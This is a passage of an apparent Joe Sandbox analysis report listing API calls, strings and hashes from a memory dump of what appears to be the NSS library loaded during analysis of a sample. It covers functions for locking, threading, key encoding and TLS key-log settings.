• PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C00A6
• PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C00B6
• PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C00C6
• PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C00D6
• PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C00E6
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Lock$CountCriticalErrorInitializeLastSectionSpincallocfree
• String ID:
• API String ID: 1407103528-0
APIs
• PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C506BF7), ref: 6C506EB6
  • Part of subcall function 6C461240: TlsGetValue.KERNEL32(00000040,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461267
  • Part of subcall function 6C461240: EnterCriticalSection.KERNEL32(?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C46127C
  • Part of subcall function 6C461240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461291
  • Part of subcall function 6C461240: PR_Unlock.NSS3(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C4612A0
• fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C5AFC0A,6C506BF7), ref: 6C506ECD
• ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C506EE0
• fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C506EFC
• PR_NewLock.NSS3 ref: 6C506F04
• fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C506F18
• PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C506BF7), ref: 6C506F30
• PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C506BF7), ref: 6C506F54
• PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C506BF7), ref: 6C506FE0
• PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C506BF7), ref: 6C506FFD
Strings
• NSS_SSL_CBC_RANDOM_IV, xrefs: 6C506FF8
• SSLKEYLOGFILE, xrefs: 6C506EB1
• SSLFORCELOCKS, xrefs: 6C506F2B
• # SSL/TLS secrets log file, generated by NSS, xrefs: 6C506EF7
• NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C506FDB
• NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C506F4F
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
                                                                                                                                                                                                                          • String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
                                                                                                                                                                                                                          • API String ID: 412497378-2352201381
                                                                                                                                                                                                                          • Opcode ID: 247c5aed71cb3664476af36d786226cc18cc9a8b31dbc6a32a1abb75d0856f58
                                                                                                                                                                                                                          • Instruction ID: f646a159f3b5f341656e229e154041c7b45ee7d81e1ade23ae18aad620b9811d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 247c5aed71cb3664476af36d786226cc18cc9a8b31dbc6a32a1abb75d0856f58
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88A12DB2B55E9187F7109A3CCC0178437B2ABD33A9F59476AEC31C7ED8DB75A4808249
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C485DEC
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6C485E0F
                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(00000828), ref: 6C485E35
                                                                                                                                                                                                                          • SECKEY_CopyPublicKey.NSS3(?), ref: 6C485E6A
                                                                                                                                                                                                                          • HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6C485EC3
                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6C485ED9
                                                                                                                                                                                                                          • SECKEY_SignatureLen.NSS3(?), ref: 6C485F09
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6C485F49
                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C485F89
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C485FA0
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C485FB6
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C485FBF
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C48600C
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C486079
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C486084
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C486094
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2310191401-3916222277
                                                                                                                                                                                                                          • Opcode ID: 9fe49594a336c0579bf9c0884c4cfe4fc3cf11d70488fb2550e0662188041684
                                                                                                                                                                                                                          • Instruction ID: db78d8e9841570972076eacfd68ed77c1d9354c39d745715965fae66a80b9cc6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fe49594a336c0579bf9c0884c4cfe4fc3cf11d70488fb2550e0662188041684
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F281E3B1E022059BEB10CF68CC84FAE77B5AF44319F144128E91AA7B91E731E905CBE1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000144,?,?,?,?,?,6C45B45E,?,?,?,?,?,?,?,?), ref: 6C45B87D
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C45B8FE
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C45B912
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C45B959
                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C45B977
                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,0000002C), ref: 6C45B983
                                                                                                                                                                                                                          • PR_NewCondVar.NSS3 ref: 6C45B9B9
                                                                                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(-00000040,000005DC,?,?), ref: 6C45BA54
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6C45BA5F
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C45BA77
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?), ref: 6C45BA96
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C45BA9D
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C45BAB3
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?), ref: 6C45BACD
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C45BAD4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$free$DeleteErrorValuecalloc$CondCountEnterInitializeLastSpin
                                                                                                                                                                                                                          • String ID: T ]l$X ]l
                                                                                                                                                                                                                          • API String ID: 1841981668-1146210263
                                                                                                                                                                                                                          • Opcode ID: f5da456036ce2c5ff4e58ca311257d0f721d65bcc67c6ab6c63eff41684e70ec
                                                                                                                                                                                                                          • Instruction ID: f6867949943837ec95b402305c2d23edc9007851554a70aaa03fd70892c99291
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f5da456036ce2c5ff4e58ca311257d0f721d65bcc67c6ab6c63eff41684e70ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1051CBB4A007019FEB10DF29CC48F5A7BF4BF09309F41852DE85A86B41EB31E965CB99
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE004,00000000), ref: 6C46F86F
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • PR_smprintf.NSS3(%lu,?), ref: 6C46F899
                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s.%lu,00000000,?), ref: 6C46FA4E
                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s.%llu,00000000,00000000,00000000), ref: 6C46FAA2
                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s.UNSUPPORTED,00000000), ref: 6C46FAB6
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C46FAC1
                                                                                                                                                                                                                          • PR_smprintf.NSS3(OID.UNSUPPORTED), ref: 6C46FAD3
                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 6C46FB00
                                                                                                                                                                                                                          • PR_smprintf.NSS3(OID.%llu.%llu,00000000,?,00000000,FFFFFFD8,00000000,00000000,00000028,00000000), ref: 6C46FB4B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: R_smprintf$ErrorValue__aulldivfree
• String ID: %s.%llu$%s.%lu$%s.UNSUPPORTED$OID.%llu.%llu$OID.%lu.%lu$OID.UNSUPPORTED
• API String ID: 2145857551-3523515424
• Opcode ID: c7e11f6c0ee31394159a167705b64f1a3fe275072121f76ccd70b877dc6402ba
• Instruction ID: d92bfe487689e9c8e362b5263512649bf51c218684b09eb15f9a333a8badb930
• Opcode Fuzzy Hash: c7e11f6c0ee31394159a167705b64f1a3fe275072121f76ccd70b877dc6402ba
• Instruction Fuzzy Hash: E0817E72E160314BFB08CB6E8C55F7E7FA29BC5305F1841A9E8A1DBF4DD670880583A1
APIs
• calloc.MOZGLUE(00000001,00000080), ref: 6C589C70
• PR_NewLock.NSS3 ref: 6C589C85
  • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
• PR_NewCondVar.NSS3(00000000), ref: 6C589C96
  • Part of subcall function 6C45BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C4621BC), ref: 6C45BB8C
• PR_NewLock.NSS3 ref: 6C589CA9
  • Part of subcall function 6C5398D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C539946
  • Part of subcall function 6C5398D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C3F16B7,00000000), ref: 6C53994E
  • Part of subcall function 6C5398D0: free.MOZGLUE(00000000), ref: 6C53995E
• PR_NewLock.NSS3 ref: 6C589CB9
• PR_NewLock.NSS3 ref: 6C589CC9
• PR_NewCondVar.NSS3(00000000), ref: 6C589CDA
  • Part of subcall function 6C45BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C45BBEB
  • Part of subcall function 6C45BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C45BBFB
  • Part of subcall function 6C45BB80: GetLastError.KERNEL32 ref: 6C45BC03
  • Part of subcall function 6C45BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C45BC19
  • Part of subcall function 6C45BB80: free.MOZGLUE(00000000), ref: 6C45BC22
• PR_NewCondVar.NSS3(?), ref: 6C589CF0
• PR_NewPollableEvent.NSS3 ref: 6C589D03
  • Part of subcall function 6C57F3B0: PR_CallOnce.NSS3(6C5D14B0,6C57F510), ref: 6C57F3E6
  • Part of subcall function 6C57F3B0: PR_CreateIOLayerStub.NSS3(6C5D006C), ref: 6C57F402
  • Part of subcall function 6C57F3B0: PR_Malloc.NSS3(00000004), ref: 6C57F416
  • Part of subcall function 6C57F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6C57F42D
  • Part of subcall function 6C57F3B0: PR_SetSocketOption.NSS3(?), ref: 6C57F455
  • Part of subcall function 6C57F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6C57F473
  • Part of subcall function 6C539890: TlsGetValue.KERNEL32(?,?,?,6C5397EB), ref: 6C53989E
• EnterCriticalSection.KERNEL32(?), ref: 6C589D78
• calloc.MOZGLUE(00000001,0000000C), ref: 6C589DAF
• _PR_CreateThread.NSS3(00000000,6C589EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6C589D9F
  • Part of subcall function 6C45B3C0: TlsGetValue.KERNEL32 ref: 6C45B403
  • Part of subcall function 6C45B3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6C45B459
• _PR_CreateThread.NSS3(00000000,6C58A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6C589DE8
• calloc.MOZGLUE(00000001,0000000C), ref: 6C589DFC
• _PR_CreateThread.NSS3(00000000,6C58A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6C589E29
• calloc.MOZGLUE(00000001,0000000C), ref: 6C589E3D
• _PR_MD_UNLOCK.NSS3(?), ref: 6C589E71
• PR_SetError.NSS3(FFFFE890,00000000), ref: 6C589E89
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
• String ID:
• API String ID: 4254102231-0
• Opcode ID: befbb0a00965b7c60c37624d99d04ef4240ca21ba001fe762380efde82d49cfc
• Instruction ID: 49ef83f04e77124537cfc4517aa180c7ac58b3f600bfc5f650a02692b905b40a
• Opcode Fuzzy Hash: befbb0a00965b7c60c37624d99d04ef4240ca21ba001fe762380efde82d49cfc
• Instruction Fuzzy Hash: 98614DB1A01716AFD710DF75CC44AA7BBE8FF48208B04452DE859C7B11EB70E914CBA1
APIs
• SECKEY_CopyPublicKey.NSS3(?), ref: 6C484014
  • Part of subcall function 6C4839F0: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C485E6F,?), ref: 6C483A08
  • Part of subcall function 6C4839F0: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C485E6F), ref: 6C483A1C
  • Part of subcall function 6C4839F0: memset.VCRUNTIME140(-00000004,00000000,000000A8,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C483A3C
• PORT_NewArena_Util.NSS3(00000800), ref: 6C484038
  • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
  • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
  • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
• PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C48404D
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
  • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
  • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
  • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
• SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6C59A0F4), ref: 6C4840C2
  • Part of subcall function 6C4CF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C4CF0C8
  • Part of subcall function 6C4CF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4CF122
• SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,00000010,00000000), ref: 6C48409A
  • Part of subcall function 6C4CBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C47E708,00000000,00000000,00000004,00000000), ref: 6C4CBE6A
  • Part of subcall function 6C4CBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C4804DC,?), ref: 6C4CBE7E
  • Part of subcall function 6C4CBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C4CBEC2
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4840DE
• PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4840F4
• PR_SetError.NSS3(FFFFE013,00000000), ref: 6C484108
• SECITEM_CopyItem_Util.NSS3(00000000,?,00000010), ref: 6C48411A
• SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,000000C8), ref: 6C484137
• SECITEM_CopyItem_Util.NSS3(00000000,-0000001C,-00000020), ref: 6C484150
• SEC_ASN1EncodeItem_Util.NSS3(00000000,?,-00000010,6C59A1C8), ref: 6C48417E
• SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,0000007C), ref: 6C484194
• SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C4841A7
• PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4841B2
• PK11_DestroyObject.NSS3(?,?), ref: 6C4841D9
• PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C4841FC
• SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6C59A1A8), ref: 6C48422D
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Util$Item_$Arena_$Copy$ArenaFree$AlgorithmEncodeError$Alloc_Value$AllocateCriticalDestroyEnterFindInitK11_LockObjectPoolPublicSectionTag_UnlockZfreecallocmemset
• String ID:
• API String ID: 912348568-0
• Opcode ID: ee8added3202c64b77945b169b3258f19ab5ab8a36f67b19477c5609cd611f08
• Instruction ID: bb4522adccc4efbbcbfb076fbc69916fc67f739904fb53d7cd31308e9ec1c8dd
• Opcode Fuzzy Hash: ee8added3202c64b77945b169b3258f19ab5ab8a36f67b19477c5609cd611f08
• Instruction Fuzzy Hash: D45127B5B063006BF710DA299C55F6776ECDF5028DF04162DEC5AC6F92FB31E50882A2
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C4C8E01,00000000,6C4C9060,6C5D0B64), ref: 6C4C8E7B
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C4C8E01,00000000,6C4C9060,6C5D0B64), ref: 6C4C8E9E
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(6C5D0B64,00000001,?,?,?,?,6C4C8E01,00000000,6C4C9060,6C5D0B64), ref: 6C4C8EAD
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C4C8E01,00000000,6C4C9060,6C5D0B64), ref: 6C4C8EC3
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C4C8E01,00000000,6C4C9060,6C5D0B64), ref: 6C4C8ED8
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C4C8E01,00000000,6C4C9060,6C5D0B64), ref: 6C4C8EE5
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C4C8E01), ref: 6C4C8EFB
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C5D0B64,6C5D0B64), ref: 6C4C8F11
                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C4C8F3F
                                                                                                                                                                                                                            • Part of subcall function 6C4CA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C4CA421,00000000,00000000,6C4C9826), ref: 6C4CA136
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4C904A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C4C8E76
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
